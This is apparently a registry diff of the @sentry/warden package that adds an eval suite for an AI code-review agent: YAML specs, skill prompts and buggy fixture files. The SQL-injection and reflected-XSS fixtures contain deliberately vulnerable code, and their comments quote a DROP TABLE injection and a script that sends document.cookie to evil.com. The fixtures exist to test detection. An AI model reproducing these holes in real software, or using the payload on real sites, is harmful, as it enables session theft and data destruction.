@sentry/warden 0.8.0 → 0.10.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (144) hide show
  1. package/README.md +4 -0
  2. package/conductor.json +8 -0
  3. package/dist/cli/fix.d.ts +3 -1
  4. package/dist/cli/fix.d.ts.map +1 -1
  5. package/dist/cli/fix.js +91 -59
  6. package/dist/cli/fix.js.map +1 -1
  7. package/dist/cli/main.d.ts.map +1 -1
  8. package/dist/cli/main.js +37 -9
  9. package/dist/cli/main.js.map +1 -1
  10. package/dist/cli/output/formatters.d.ts.map +1 -1
  11. package/dist/cli/output/formatters.js +3 -8
  12. package/dist/cli/output/formatters.js.map +1 -1
  13. package/dist/cli/output/ink-runner.d.ts +6 -17
  14. package/dist/cli/output/ink-runner.d.ts.map +1 -1
  15. package/dist/cli/output/ink-runner.js +124 -115
  16. package/dist/cli/output/ink-runner.js.map +1 -1
  17. package/dist/cli/output/jsonl.d.ts +7 -1
  18. package/dist/cli/output/jsonl.d.ts.map +1 -1
  19. package/dist/cli/output/jsonl.js +4 -1
  20. package/dist/cli/output/jsonl.js.map +1 -1
  21. package/dist/cli/output/reporter.d.ts +7 -3
  22. package/dist/cli/output/reporter.d.ts.map +1 -1
  23. package/dist/cli/output/reporter.js +15 -1
  24. package/dist/cli/output/reporter.js.map +1 -1
  25. package/dist/cli/output/tasks.d.ts +10 -1
  26. package/dist/cli/output/tasks.d.ts.map +1 -1
  27. package/dist/cli/output/tasks.js +127 -28
  28. package/dist/cli/output/tasks.js.map +1 -1
  29. package/dist/cli/terminal.d.ts +7 -1
  30. package/dist/cli/terminal.d.ts.map +1 -1
  31. package/dist/cli/terminal.js +31 -9
  32. package/dist/cli/terminal.js.map +1 -1
  33. package/dist/config/schema.d.ts +0 -1
  34. package/dist/config/schema.d.ts.map +1 -1
  35. package/dist/config/schema.js +1 -2
  36. package/dist/config/schema.js.map +1 -1
  37. package/dist/evals/index.d.ts +22 -0
  38. package/dist/evals/index.d.ts.map +1 -0
  39. package/dist/evals/index.js +92 -0
  40. package/dist/evals/index.js.map +1 -0
  41. package/dist/evals/judge.d.ts +12 -0
  42. package/dist/evals/judge.d.ts.map +1 -0
  43. package/dist/evals/judge.js +171 -0
  44. package/dist/evals/judge.js.map +1 -0
  45. package/dist/evals/runner.d.ts +18 -0
  46. package/dist/evals/runner.d.ts.map +1 -0
  47. package/dist/evals/runner.js +133 -0
  48. package/dist/evals/runner.js.map +1 -0
  49. package/dist/{examples → evals}/setup.d.ts.map +1 -1
  50. package/dist/evals/setup.js.map +1 -0
  51. package/dist/evals/types.d.ts +166 -0
  52. package/dist/evals/types.d.ts.map +1 -0
  53. package/dist/evals/types.js +134 -0
  54. package/dist/evals/types.js.map +1 -0
  55. package/dist/output/dedup.d.ts.map +1 -1
  56. package/dist/output/dedup.js +29 -57
  57. package/dist/output/dedup.js.map +1 -1
  58. package/dist/output/github-checks.d.ts.map +1 -1
  59. package/dist/output/github-checks.js +38 -10
  60. package/dist/output/github-checks.js.map +1 -1
  61. package/dist/output/renderer.d.ts.map +1 -1
  62. package/dist/output/renderer.js +16 -1
  63. package/dist/output/renderer.js.map +1 -1
  64. package/dist/output/stale.d.ts +1 -0
  65. package/dist/output/stale.d.ts.map +1 -1
  66. package/dist/output/stale.js +14 -8
  67. package/dist/output/stale.js.map +1 -1
  68. package/dist/sdk/analyze.d.ts +11 -0
  69. package/dist/sdk/analyze.d.ts.map +1 -1
  70. package/dist/sdk/analyze.js +185 -27
  71. package/dist/sdk/analyze.js.map +1 -1
  72. package/dist/sdk/extract.d.ts +55 -1
  73. package/dist/sdk/extract.d.ts.map +1 -1
  74. package/dist/sdk/extract.js +222 -32
  75. package/dist/sdk/extract.js.map +1 -1
  76. package/dist/sdk/haiku.d.ts +20 -0
  77. package/dist/sdk/haiku.d.ts.map +1 -1
  78. package/dist/sdk/haiku.js +159 -77
  79. package/dist/sdk/haiku.js.map +1 -1
  80. package/dist/sdk/model-pricing.json +6 -12
  81. package/dist/sdk/pricing.d.ts +5 -0
  82. package/dist/sdk/pricing.d.ts.map +1 -1
  83. package/dist/sdk/pricing.js +11 -2
  84. package/dist/sdk/pricing.js.map +1 -1
  85. package/dist/sdk/prompt.d.ts.map +1 -1
  86. package/dist/sdk/prompt.js +4 -1
  87. package/dist/sdk/prompt.js.map +1 -1
  88. package/dist/sdk/runner.d.ts +2 -2
  89. package/dist/sdk/runner.d.ts.map +1 -1
  90. package/dist/sdk/runner.js +1 -1
  91. package/dist/sdk/runner.js.map +1 -1
  92. package/dist/sdk/types.d.ts +9 -3
  93. package/dist/sdk/types.d.ts.map +1 -1
  94. package/dist/sdk/types.js +1 -1
  95. package/dist/sdk/types.js.map +1 -1
  96. package/dist/sdk/usage.d.ts +5 -0
  97. package/dist/sdk/usage.d.ts.map +1 -1
  98. package/dist/sdk/usage.js +11 -3
  99. package/dist/sdk/usage.js.map +1 -1
  100. package/dist/sentry.d.ts +15 -0
  101. package/dist/sentry.d.ts.map +1 -1
  102. package/dist/sentry.js +40 -1
  103. package/dist/sentry.js.map +1 -1
  104. package/dist/triggers/matcher.d.ts +2 -2
  105. package/dist/triggers/matcher.d.ts.map +1 -1
  106. package/dist/triggers/matcher.js +10 -8
  107. package/dist/triggers/matcher.js.map +1 -1
  108. package/dist/types/index.d.ts +19 -0
  109. package/dist/types/index.d.ts.map +1 -1
  110. package/dist/types/index.js +25 -0
  111. package/dist/types/index.js.map +1 -1
  112. package/dist/utils/async.d.ts +14 -0
  113. package/dist/utils/async.d.ts.map +1 -1
  114. package/dist/utils/async.js +33 -0
  115. package/dist/utils/async.js.map +1 -1
  116. package/dist/utils/index.d.ts +1 -1
  117. package/dist/utils/index.d.ts.map +1 -1
  118. package/dist/utils/index.js +1 -1
  119. package/dist/utils/index.js.map +1 -1
  120. package/evals/README.md +154 -0
  121. package/evals/bug-detection.yaml +56 -0
  122. package/evals/fixtures/ignores-style-issues/utils.ts +48 -0
  123. package/evals/fixtures/missing-await/cache.ts +45 -0
  124. package/evals/fixtures/null-property-access/handler.ts +36 -0
  125. package/evals/fixtures/off-by-one/paginator.ts +38 -0
  126. package/evals/fixtures/sql-injection/api.ts +59 -0
  127. package/evals/fixtures/stale-closure/counter.tsx +33 -0
  128. package/evals/fixtures/wrong-comparison/validator.ts +52 -0
  129. package/evals/fixtures/xss-reflected/server.ts +55 -0
  130. package/evals/precision.yaml +15 -0
  131. package/evals/security-scanning.yaml +24 -0
  132. package/evals/skills/bug-detection.md +33 -0
  133. package/evals/skills/precision.md +18 -0
  134. package/evals/skills/security-scanning.md +32 -0
  135. package/package.json +4 -2
  136. package/plugins/warden/skills/warden/references/config-schema.md +4 -2
  137. package/plugins/warden/skills/warden/references/configuration.md +2 -2
  138. package/dist/examples/index.d.ts +0 -50
  139. package/dist/examples/index.d.ts.map +0 -1
  140. package/dist/examples/index.js +0 -104
  141. package/dist/examples/index.js.map +0 -1
  142. package/dist/examples/setup.js.map +0 -1
  143. /package/dist/{examples → evals}/setup.d.ts +0 -0
  144. /package/dist/{examples → evals}/setup.js +0 -0
@@ -0,0 +1,56 @@
1
+ skill: skills/bug-detection.md
2
+
3
+ evals:
4
+ - name: null-property-access
5
+ given: code that accesses properties on an array .find() result without null checking
6
+ files:
7
+ - fixtures/null-property-access/handler.ts
8
+ should_find:
9
+ - finding: accessing .name and .profile.avatar on a potentially undefined user object from Array.find()
10
+ severity: high
11
+ should_not_find:
12
+ - style, formatting, or naming issues
13
+ - the lack of try/catch around the fetch call
14
+
15
+ - name: off-by-one
16
+ given: pagination logic that uses Math.floor instead of Math.ceil, skipping the last page
17
+ files:
18
+ - fixtures/off-by-one/paginator.ts
19
+ should_find:
20
+ - finding: off-by-one error in page count calculation that loses the last page when totalItems is not evenly divisible by pageSize
21
+ severity: medium
22
+ should_not_find:
23
+ - use of any[] type
24
+ - missing error handling
25
+
26
+ - name: missing-await
27
+ given: async cache lookup missing await, causing a Promise object to be used as a truthy value
28
+ files:
29
+ - fixtures/missing-await/cache.ts
30
+ should_find:
31
+ - finding: missing await on loadFromCache() call, so cached is always a truthy Promise and the function never actually fetches fresh data
32
+ severity: high
33
+ should_not_find:
34
+ - console.log statements
35
+ - missing return type annotations
36
+
37
+ - name: wrong-comparison
38
+ given: permission check using <= instead of >=, inverting the access control logic
39
+ files:
40
+ - fixtures/wrong-comparison/validator.ts
41
+ should_find:
42
+ - finding: comparison operator is <= instead of >=, granting access to lower-privilege users while denying higher-privilege users
43
+ severity: high
44
+ should_not_find:
45
+ - hardcoded role strings
46
+ - suggestion to use an enum for roles
47
+
48
+ - name: stale-closure
49
+ given: React useEffect with setInterval that captures count in a stale closure
50
+ files:
51
+ - fixtures/stale-closure/counter.tsx
52
+ should_find:
53
+ - finding: "stale closure: setInterval callback captures initial count value and never sees updates, so the counter always sets the same value"
54
+ severity: high
55
+ should_not_find:
56
+ - TypeScript type annotation issues
@@ -0,0 +1,48 @@
1
+ // This code is functionally correct but has style issues.
2
+ // A precision-focused eval: the skill should NOT report any of these as bugs.
3
+
4
+ // Inconsistent naming convention (camelCase vs snake_case)
5
+ export function calculate_total(items: number[]): number {
6
+ let runningTotal = 0;
7
+ for (let i = 0; i < items.length; i++) {
8
+ runningTotal = runningTotal + items[i]!;
9
+ }
10
+ return runningTotal;
11
+ }
12
+
13
+ // Verbose conditional (could be simplified but is correct)
14
+ export function isEligible(age: number, hasConsent: boolean): boolean {
15
+ if (age >= 18) {
16
+ if (hasConsent === true) {
17
+ return true;
18
+ } else {
19
+ return false;
20
+ }
21
+ } else {
22
+ return false;
23
+ }
24
+ }
25
+
26
+ // Missing JSDoc, long parameter list, but functionally correct
27
+ export function formatAddress(
28
+ street: string,
29
+ city: string,
30
+ state: string,
31
+ zip: string,
32
+ country: string
33
+ ): string {
34
+ const parts = [street, city, state, zip, country];
35
+ return parts.filter((p) => p.length > 0).join(', ');
36
+ }
37
+
38
+ // Magic numbers but correct behavior
39
+ export function calculateDiscount(price: number, quantity: number): number {
40
+ if (quantity >= 100) {
41
+ return price * 0.8;
42
+ } else if (quantity >= 50) {
43
+ return price * 0.9;
44
+ } else if (quantity >= 10) {
45
+ return price * 0.95;
46
+ }
47
+ return price;
48
+ }
@@ -0,0 +1,45 @@
1
+ interface CacheEntry {
2
+ key: string;
3
+ value: string;
4
+ expiresAt: number;
5
+ }
6
+
7
+ const store = new Map<string, CacheEntry>();
8
+
9
+ async function saveToCache(key: string, value: string, ttlMs: number): Promise<void> {
10
+ // Simulate async storage (e.g., Redis, database)
11
+ await new Promise((resolve) => setTimeout(resolve, 1));
12
+ store.set(key, {
13
+ key,
14
+ value,
15
+ expiresAt: Date.now() + ttlMs,
16
+ });
17
+ }
18
+
19
+ async function loadFromCache(key: string): Promise<string | null> {
20
+ await new Promise((resolve) => setTimeout(resolve, 1));
21
+ const entry = store.get(key);
22
+ if (!entry) return null;
23
+ if (Date.now() > entry.expiresAt) {
24
+ store.delete(key);
25
+ return null;
26
+ }
27
+ return entry.value;
28
+ }
29
+
30
+ export async function getOrFetchData(key: string, fetchFn: () => Promise<string>): Promise<string> {
31
+ // Bug: missing await on loadFromCache. The result `cached` will be a
32
+ // Promise, which is always truthy, so the cache-hit branch always runs and
33
+ // fetchFn is never called; on a real miss the caller ends up with null.
34
+ const cached = loadFromCache(key);
35
+
36
+ if (cached) {
37
+ console.log('Cache hit:', key);
38
+ return cached as unknown as string;
39
+ }
40
+
41
+ console.log('Cache miss:', key);
42
+ const fresh = await fetchFn();
43
+ await saveToCache(key, fresh, 60_000);
44
+ return fresh;
45
+ }
@@ -0,0 +1,36 @@
1
+ interface User {
2
+ id: string;
3
+ name: string;
4
+ email: string;
5
+ profile: {
6
+ avatar: string;
7
+ bio: string;
8
+ };
9
+ }
10
+
11
+ interface ApiResponse {
12
+ users: User[];
13
+ total: number;
14
+ }
15
+
16
+ async function fetchUsers(endpoint: string): Promise<ApiResponse> {
17
+ const response = await fetch(endpoint);
18
+ return response.json() as Promise<ApiResponse>;
19
+ }
20
+
21
+ export async function getUserDisplayName(userId: string): Promise<string> {
22
+ const data = await fetchUsers(`/api/users?id=${userId}`);
23
+ const user = data.users.find((u) => u.id === userId);
24
+
25
+ // Bug: user could be undefined if not found in the array,
26
+ // but we access .name without checking
27
+ const displayName = user.name;
28
+ const avatarUrl = user.profile.avatar;
29
+
30
+ return `${displayName} (${avatarUrl})`;
31
+ }
32
+
33
+ export async function getTeamMembers(teamId: string): Promise<string[]> {
34
+ const data = await fetchUsers(`/api/teams/${teamId}/members`);
35
+ return data.users.map((u) => u.name);
36
+ }
@@ -0,0 +1,38 @@
1
+ export interface PaginatedResult<T> {
2
+ items: T[];
3
+ page: number;
4
+ totalItems: number;
5
+ pageSize: number;
6
+ }
7
+
8
+ /**
9
+ * Fetch all pages of results from a paginated API endpoint.
10
+ * Collects items from every page and returns them as a flat array.
11
+ */
12
+ export async function fetchAllPages<T>(
13
+ fetchPage: (page: number) => Promise<PaginatedResult<T>>
14
+ ): Promise<T[]> {
15
+ const firstPage = await fetchPage(1);
16
+ const allItems: T[] = [...firstPage.items];
17
+
18
+ // Bug: Math.floor loses the last page when totalItems is not evenly
19
+ // divisible by pageSize. E.g., 25 items / 10 per page = 2.5, floored
20
+ // to 2, so page 3 (items 21-25) is never fetched.
21
+ const totalPages = Math.floor(firstPage.totalItems / firstPage.pageSize);
22
+
23
+ for (let page = 2; page <= totalPages; page++) {
24
+ const result = await fetchPage(page);
25
+ allItems.push(...result.items);
26
+ }
27
+
28
+ return allItems;
29
+ }
30
+
31
+ /**
32
+ * Get a specific page range of results.
33
+ */
34
+ export function getPageRange(totalItems: number, pageSize: number, currentPage: number): { start: number; end: number } {
35
+ const start = (currentPage - 1) * pageSize;
36
+ const end = Math.min(start + pageSize, totalItems);
37
+ return { start, end };
38
+ }
@@ -0,0 +1,59 @@
1
+ interface DbConnection {
2
+ query(sql: string): Promise<Record<string, unknown>[]>;
3
+ }
4
+
5
+ function getConnection(): DbConnection {
6
+ // In production this returns a real DB connection
7
+ return {
8
+ query: async (sql: string) => {
9
+ console.log('Executing:', sql);
10
+ return [];
11
+ },
12
+ };
13
+ }
14
+
15
+ interface SearchParams {
16
+ name?: string;
17
+ email?: string;
18
+ role?: string;
19
+ }
20
+
21
+ /**
22
+ * Search for users matching the given criteria.
23
+ * Builds a dynamic WHERE clause from the search parameters.
24
+ */
25
+ export async function searchUsers(params: SearchParams): Promise<Record<string, unknown>[]> {
26
+ const db = getConnection();
27
+ const conditions: string[] = [];
28
+
29
+ if (params.name) {
30
+ // Bug: Direct string interpolation of user input into SQL query.
31
+ // An attacker can pass name = "'; DROP TABLE users; --" to execute
32
+ // arbitrary SQL.
33
+ conditions.push(`name = '${params.name}'`);
34
+ }
35
+ if (params.email) {
36
+ conditions.push(`email = '${params.email}'`);
37
+ }
38
+ if (params.role) {
39
+ conditions.push(`role = '${params.role}'`);
40
+ }
41
+
42
+ const whereClause = conditions.length > 0
43
+ ? `WHERE ${conditions.join(' AND ')}`
44
+ : '';
45
+
46
+ const sql = `SELECT id, name, email, role FROM users ${whereClause}`;
47
+ return db.query(sql);
48
+ }
49
+
50
+ /**
51
+ * Get a user by their ID (this one is safe - the id is validated as a positive integer before interpolation).
52
+ */
53
+ export async function getUserById(id: number): Promise<Record<string, unknown> | null> {
54
+ const db = getConnection();
55
+ // This is safe because we validate the type
56
+ if (!Number.isInteger(id) || id <= 0) return null;
57
+ const results = await db.query(`SELECT * FROM users WHERE id = ${id}`);
58
+ return results[0] ?? null;
59
+ }
@@ -0,0 +1,33 @@
1
+ import { useState, useEffect } from 'react';
2
+
3
+ interface CounterProps {
4
+ initialValue: number;
5
+ step: number;
6
+ intervalMs: number;
7
+ }
8
+
9
+ /**
10
+ * An auto-incrementing counter that ticks at a given interval.
11
+ */
12
+ export function AutoCounter({ initialValue, step, intervalMs }: CounterProps) {
13
+ const [count, setCount] = useState(initialValue);
14
+
15
+ useEffect(() => {
16
+ // Bug: This closure captures `count` once at mount time.
17
+ // Every tick reads the same stale `count` value and sets
18
+ // count to initialValue + step, over and over. The counter
19
+ // never actually increments past the first tick.
20
+ const id = setInterval(() => {
21
+ setCount(count + step);
22
+ }, intervalMs);
23
+
24
+ return () => clearInterval(id);
25
+ // eslint-disable-next-line react-hooks/exhaustive-deps
26
+ }, []);
27
+
28
+ return (
29
+ <div>
30
+ <span data-testid="count">{count}</span>
31
+ </div>
32
+ );
33
+ }
@@ -0,0 +1,52 @@
1
+ interface Permission {
2
+ resource: string;
3
+ action: 'read' | 'write' | 'delete';
4
+ role: string;
5
+ }
6
+
7
+ const ROLE_HIERARCHY: Record<string, number> = {
8
+ viewer: 0,
9
+ editor: 1,
10
+ admin: 2,
11
+ superadmin: 3,
12
+ };
13
+
14
+ /**
15
+ * Check if a user's role has sufficient permissions for an action.
16
+ * Returns true if the user is allowed to perform the action.
17
+ */
18
+ export function hasPermission(userRole: string, requiredRole: string): boolean {
19
+ const userLevel = ROLE_HIERARCHY[userRole] ?? 0;
20
+ const requiredLevel = ROLE_HIERARCHY[requiredRole] ?? 0;
21
+
22
+ // Bug: should be >= but uses <=, so only users at or BELOW the required
23
+ // level are granted access (e.g., a viewer can perform admin actions,
24
+ // but an admin cannot perform editor actions).
25
+ return userLevel <= requiredLevel;
26
+ }
27
+
28
+ /**
29
+ * Filter a list of permissions to only those a user can perform.
30
+ */
31
+ export function filterAllowedActions(
32
+ userRole: string,
33
+ permissions: Permission[]
34
+ ): Permission[] {
35
+ return permissions.filter((p) => hasPermission(userRole, p.role));
36
+ }
37
+
38
+ /**
39
+ * Validate that a user can perform a specific action on a resource.
40
+ */
41
+ export function validateAccess(
42
+ userRole: string,
43
+ resource: string,
44
+ action: string,
45
+ permissions: Permission[]
46
+ ): boolean {
47
+ const matching = permissions.find(
48
+ (p) => p.resource === resource && p.action === action
49
+ );
50
+ if (!matching) return false;
51
+ return hasPermission(userRole, matching.role);
52
+ }
@@ -0,0 +1,55 @@
1
+ /**
2
+ * Simple HTTP request handler for a search page.
3
+ * Renders search results with the query term displayed back to the user.
4
+ */
5
+ export function handleSearchRequest(url: string): string {
6
+ const parsed = new URL(url, 'http://localhost:3000');
7
+ const query = parsed.searchParams.get('q') ?? '';
8
+ const page = parseInt(parsed.searchParams.get('page') ?? '1', 10);
9
+
10
+ // Simulate search results
11
+ const results = performSearch(query, page);
12
+
13
+ // Bug: The query string from the URL is interpolated directly into HTML
14
+ // without escaping. An attacker can craft a URL like:
15
+ // /search?q=<script>document.location='http://evil.com/?c='+document.cookie</script>
16
+ // and the script will execute in the victim's browser.
17
+ return `
18
+ <!DOCTYPE html>
19
+ <html>
20
+ <head><title>Search Results</title></head>
21
+ <body>
22
+ <h1>Search Results</h1>
23
+ <p>Showing results for: <strong>${query}</strong></p>
24
+ <p>Page ${page} of ${results.totalPages}</p>
25
+ <ul>
26
+ ${results.items.map((item) => `<li>${escapeHtml(item.title)}</li>`).join('\n')}
27
+ </ul>
28
+ </body>
29
+ </html>
30
+ `;
31
+ }
32
+
33
+ function escapeHtml(text: string): string {
34
+ return text
35
+ .replace(/&/g, '&amp;')
36
+ .replace(/</g, '&lt;')
37
+ .replace(/>/g, '&gt;')
38
+ .replace(/"/g, '&quot;');
39
+ }
40
+
41
+ interface SearchResult {
42
+ items: { title: string; url: string }[];
43
+ totalPages: number;
44
+ }
45
+
46
+ function performSearch(query: string, page: number): SearchResult {
47
+ // Stub implementation
48
+ return {
49
+ items: [
50
+ { title: `Result for "${query}" - item 1`, url: '/result/1' },
51
+ { title: `Result for "${query}" - item 2`, url: '/result/2' },
52
+ ],
53
+ totalPages: Math.max(1, page),
54
+ };
55
+ }
@@ -0,0 +1,15 @@
1
+ skill: skills/precision.md
2
+
3
+ evals:
4
+ - name: ignores-style-issues
5
+ given: functionally correct code with style issues (mixed naming conventions, verbose conditionals, magic numbers)
6
+ files:
7
+ - fixtures/ignores-style-issues/utils.ts
8
+ should_find:
9
+ - finding: "no bugs: the code is functionally correct despite having style issues, so zero or only info-level findings are expected"
10
+ required: false
11
+ should_not_find:
12
+ - inconsistent naming convention (snake_case vs camelCase)
13
+ - missing JSDoc comments
14
+ - verbose conditional that could be simplified
15
+ - magic numbers in discount calculation
@@ -0,0 +1,24 @@
1
+ skill: skills/security-scanning.md
2
+
3
+ evals:
4
+ - name: sql-injection
5
+ given: SQL query built via string interpolation with user-supplied search parameters
6
+ files:
7
+ - fixtures/sql-injection/api.ts
8
+ should_find:
9
+ - finding: "SQL injection: user input from params.name, params.email, and params.role is directly interpolated into SQL query without parameterization"
10
+ severity: critical
11
+ should_not_find:
12
+ - the getConnection helper implementation
13
+ - missing email format validation as the primary issue
14
+
15
+ - name: xss-reflected
16
+ given: HTML template that renders URL query parameter directly into page without escaping
17
+ files:
18
+ - fixtures/xss-reflected/server.ts
19
+ should_find:
20
+ - finding: "reflected XSS: the query parameter from the URL is interpolated into HTML via template literal without calling escapeHtml()"
21
+ severity: critical
22
+ should_not_find:
23
+ - hardcoded port number
24
+ - missing HTTPS as the primary issue
@@ -0,0 +1,33 @@
1
+ ---
2
+ name: eval-bug-detection
3
+ description: Test skill for bug detection evals. Finds logic errors, null handling bugs, async issues, and edge cases.
4
+ ---
5
+
6
+ You are an expert bug hunter analyzing code changes.
7
+
8
+ ## What to Report
9
+
10
+ Find bugs that will cause incorrect behavior at runtime:
11
+
12
+ - Null/undefined property access without guards
13
+ - Off-by-one and boundary errors
14
+ - Missing await on async operations
15
+ - Wrong comparison operators (< vs <=, && vs ||)
16
+ - Stale closures capturing outdated values
17
+ - Type coercion causing unexpected behavior
18
+
19
+ ## What NOT to Report
20
+
21
+ - Style or formatting preferences
22
+ - Missing error handling that "might" matter
23
+ - Performance concerns (unless causing incorrect behavior)
24
+ - Unused variables or dead code
25
+ - Missing tests or documentation
26
+ - Security vulnerabilities (separate concern)
27
+
28
+ ## Output Requirements
29
+
30
+ For each bug, provide:
31
+ - The exact file and line
32
+ - What incorrect behavior occurs
33
+ - What specific input or condition triggers it
@@ -0,0 +1,18 @@
1
+ ---
2
+ name: eval-precision
3
+ description: Test skill for precision evals. Only reports logic bugs, nothing else.
4
+ ---
5
+
6
+ You are a strict bug detector. You ONLY report provable logic bugs.
7
+
8
+ ## Rules
9
+
10
+ 1. Only report bugs that WILL cause incorrect behavior
11
+ 2. You must be able to construct a specific input that triggers failure
12
+ 3. Do NOT report style, formatting, naming, or documentation issues
13
+ 4. Do NOT report missing error handling
14
+ 5. Do NOT report performance concerns
15
+ 6. Do NOT report security vulnerabilities
16
+ 7. If the code is correct, return an empty findings array
17
+
18
+ Be extremely conservative. When in doubt, do not report.
@@ -0,0 +1,32 @@
1
+ ---
2
+ name: eval-security-scanning
3
+ description: Test skill for security scanning evals. Finds injection, XSS, and other OWASP Top 10 vulnerabilities.
4
+ ---
5
+
6
+ You are a security expert analyzing code changes for vulnerabilities.
7
+
8
+ ## What to Report
9
+
10
+ Find security vulnerabilities that could be exploited:
11
+
12
+ - SQL injection (unsanitized input in queries)
13
+ - Cross-site scripting (XSS) - reflected and stored
14
+ - Command injection
15
+ - Path traversal
16
+ - Authentication/authorization bypasses
17
+ - Insecure cryptography
18
+
19
+ ## What NOT to Report
20
+
21
+ - Code quality or style issues
22
+ - Performance concerns
23
+ - Missing but non-security error handling
24
+ - Hardcoded configuration values (unless they are secrets)
25
+ - Missing HTTPS (unless specifically relevant)
26
+
27
+ ## Output Requirements
28
+
29
+ For each vulnerability:
30
+ - The exact file and line
31
+ - The attack vector (how it could be exploited)
32
+ - Severity based on exploitability and impact
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@sentry/warden",
3
- "version": "0.8.0",
3
+ "version": "0.10.0",
4
4
  "description": "Event-driven agent that reacts to GitHub events and executes skills via Claude Code SDK",
5
5
  "type": "module",
6
6
  "main": "dist/index.js",
@@ -12,7 +12,7 @@
12
12
  "pre-commit": "pnpm lint-staged && pnpm typecheck"
13
13
  },
14
14
  "lint-staged": {
15
- "*.ts": [
15
+ "src/**/*.ts": [
16
16
  "eslint --fix"
17
17
  ],
18
18
  "docs/**/*.astro": [
@@ -50,6 +50,7 @@
50
50
  "nanoid": "^5.1.6",
51
51
  "react": "^18.3.1",
52
52
  "smol-toml": "^1.6.0",
53
+ "yaml": "^2.8.2",
53
54
  "zod": "^4.3.6"
54
55
  },
55
56
  "devDependencies": {
@@ -79,6 +80,7 @@
79
80
  "test": "vitest run",
80
81
  "test:watch": "vitest",
81
82
  "test:examples": "vitest run --config vitest.integration.config.ts",
83
+ "test:evals": "vitest run --config vitest.evals.config.ts",
82
84
  "typecheck": "tsc --noEmit",
83
85
  "update-pricing": "tsx scripts/update-pricing.ts"
84
86
  }
@@ -69,8 +69,10 @@ fixBranchPrefix = "security-fix" # Branch name prefix
69
69
 
70
70
  **Trigger types:**
71
71
  - `pull_request` - Triggers on PR events
72
- - `local` - Triggers on local CLI runs
73
- - `schedule` - Triggers on cron schedule (GitHub Action)
72
+ - `local` - Local CLI only (will not run in CI)
73
+ - `schedule` - Cron schedule (GitHub Action only)
74
+
75
+ All skills run locally regardless of trigger type. Skills with no triggers run everywhere (wildcard). Use `type = "local"` for skills that should *only* run locally.
74
76
 
75
77
  **Actions (for pull_request):**
76
78
  - `opened`, `synchronize`, `reopened`, `closed`
@@ -21,7 +21,7 @@ actions = ["opened", "synchronize"]
21
21
 
22
22
  ## Skill Configuration
23
23
 
24
- Skills define what to analyze and when. Each skill requires a name and at least one trigger:
24
+ Skills define what to analyze and when. Each skill requires a name. Triggers are optional: skills with no triggers run everywhere (PR, local, schedule). All skills run locally regardless of trigger type.
25
25
 
26
26
  ```toml
27
27
  [[skills]]
@@ -36,7 +36,7 @@ type = "pull_request"
36
36
  actions = ["opened", "synchronize"]
37
37
  ```
38
38
 
39
- **Trigger types:** `pull_request`, `local`, `schedule`
39
+ **Trigger types:** `pull_request`, `local` (local-only), `schedule` (CI-only)
40
40
 
41
41
  **Actions (pull_request):** `opened`, `synchronize`, `reopened`, `closed`
42
42
 
@@ -1,50 +0,0 @@
1
- import { z } from 'zod';
2
- /**
3
- * Schema for expected findings in _meta.json
4
- */
5
- export declare const ExpectedFindingSchema: z.ZodObject<{
6
- severity: z.ZodEnum<{
7
- critical: "critical";
8
- high: "high";
9
- medium: "medium";
10
- low: "low";
11
- info: "info";
12
- }>;
13
- pattern: z.ZodString;
14
- file: z.ZodOptional<z.ZodString>;
15
- }, z.core.$strip>;
16
- export type ExpectedFinding = z.infer<typeof ExpectedFindingSchema>;
17
- /**
18
- * Schema for _meta.json files
19
- */
20
- export declare const ExampleMetaSchema: z.ZodObject<{
21
- skill: z.ZodString;
22
- description: z.ZodString;
23
- expected: z.ZodArray<z.ZodObject<{
24
- severity: z.ZodEnum<{
25
- critical: "critical";
26
- high: "high";
27
- medium: "medium";
28
- low: "low";
29
- info: "info";
30
- }>;
31
- pattern: z.ZodString;
32
- file: z.ZodOptional<z.ZodString>;
33
- }, z.core.$strip>>;
34
- }, z.core.$strip>;
35
- export type ExampleMeta = z.infer<typeof ExampleMetaSchema>;
36
- /**
37
- * Discover all examples with _meta.json files.
38
- * Returns an array of absolute paths to example directories.
39
- */
40
- export declare function discoverExamples(baseDir?: string): string[];
41
- /**
42
- * Load and validate a _meta.json file from an example directory.
43
- */
44
- export declare function loadExample(dir: string): ExampleMeta;
45
- /**
46
- * Get all source files in an example directory (excludes _meta.json).
47
- * Returns relative paths suitable for use with buildFileEventContext.
48
- */
49
- export declare function getExampleFiles(dir: string): string[];
50
- //# sourceMappingURL=index.d.ts.map
@@ -1 +0,0 @@
1
- {"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../../src/examples/index.ts"],"names":[],"mappings":"AAEA,OAAO,EAAE,CAAC,EAAE,MAAM,KAAK,CAAC;AAGxB;;GAEG;AACH,eAAO,MAAM,qBAAqB;;;;;;;;;;iBAIhC,CAAC;AACH,MAAM,MAAM,eAAe,GAAG,CAAC,CAAC,KAAK,CAAC,OAAO,qBAAqB,CAAC,CAAC;AAEpE;;GAEG;AACH,eAAO,MAAM,iBAAiB;;;;;;;;;;;;;;iBAI5B,CAAC;AACH,MAAM,MAAM,WAAW,GAAG,CAAC,CAAC,KAAK,CAAC,OAAO,iBAAiB,CAAC,CAAC;AAU5D;;;GAGG;AACH,wBAAgB,gBAAgB,CAAC,OAAO,CAAC,EAAE,MAAM,GAAG,MAAM,EAAE,CA6B3D;AAED;;GAEG;AACH,wBAAgB,WAAW,CAAC,GAAG,EAAE,MAAM,GAAG,WAAW,CA4BpD;AAED;;;GAGG;AACH,wBAAgB,eAAe,CAAC,GAAG,EAAE,MAAM,GAAG,MAAM,EAAE,CAgBrD"}